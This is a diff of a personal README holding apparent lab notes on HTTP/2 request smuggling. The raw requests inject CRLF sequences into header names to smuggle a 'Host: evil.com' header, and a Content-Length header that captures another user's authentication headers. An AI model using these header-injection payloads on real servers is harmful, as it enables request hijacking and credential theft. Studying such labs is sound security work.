xasyhack/xasyhack.github.io/README.md

     GET /

     Request header
-    name
+    name>
     foo: bar\r\n
-    Host: abc
+    Host: evil.com

     value: xyz

+    Response
+    Server Error: Gateway Timeout (3) connecting to evil.com
     ```
-  - Add an arbitrary header and use its name field to inject a large Content-Length header and an additional search parameter as follows
+  - Send repeater for "GET /?search=YOUR-SEARCH-QUERY" > change request method to POST > delete the body of search param and content-length
     ```
+    POST /
+    ```
+  - Add an arbitrary header and use its name field to inject a large Content-Length header and an additional search parameter as follows (Adjsut the content-length)
+    ```
     Request header
-    name
+    name>
-    foo: bar\r\n
+    foo: bar
-    Content-Length: 500\r\n
+    Content-Length: 150
-    \r\n

     search=x

     value: xyz
     ```
-  - In the main body of the request (in the message editor panel) append arbitrary characters to the original search parameter until the request is longer than the smuggled Content-Length header
+  - Copy the authentication headers in below
     ```
     0 search results for 'x: xyz
     Content-Length: 644